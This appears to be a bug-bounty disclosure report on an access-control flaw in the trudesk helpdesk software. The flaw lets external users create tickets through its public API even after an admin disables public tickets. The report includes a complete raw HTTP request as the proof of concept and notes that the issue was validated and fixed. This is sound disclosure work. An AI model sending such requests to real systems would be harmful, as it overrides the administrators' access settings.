Improper Privilege Management in polonel/trudesk

Valid

Reported on

Jun 15th 2021

💥 BUG

external user can submit ticket even when its disabled

💥 SUMMURY

external user can submit ticket even when its disabled

💥 STEP TO REPRODUCE

1. First from admin account goto settings-->tickets and disallow Allow public tickets .
So, external user cant create ticket using url http://localhost:8118/newissue .

2. Now as a external user , sent bellow request which will create a public ticket

POST /api/v1/public/tickets/create HTTP/1.1
Host: localhost:8118
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 138
Origin: http://localhost:8118
DNT: 1
Connection: close
Referer: http://localhost:8118/newissue
Cookie: $trudesk%3Atimezone=America/New_York; connect.sid=s%3AbDPu1729Dob3ofg_TynNCd_EID7q1h3y.i5p4vnPCeYzyF2mqbEvcE4E%2BVZDHrjhkquUJxSvKbi0

{"user":{"fullname":"afaaaaterss","email":"vsssvvv@sssss.com"},"ticket":{"subject":"2222mmmm","issue":"afffteraaaaaaaa"},"captcha":"PVjf"}

So, despite of being disabled for public ticket creation , still user can create ticket

Occurrences

index.jsx L45

Chris validated this vulnerability 2 years ago

ranjit-git has been awarded the disclosure bounty

The fix bounty is now up for grabs

Chris marked this as fixed with commit 17c2eb 2 years ago

Chris has been awarded the fix bounty

This vulnerability will not receive a CVE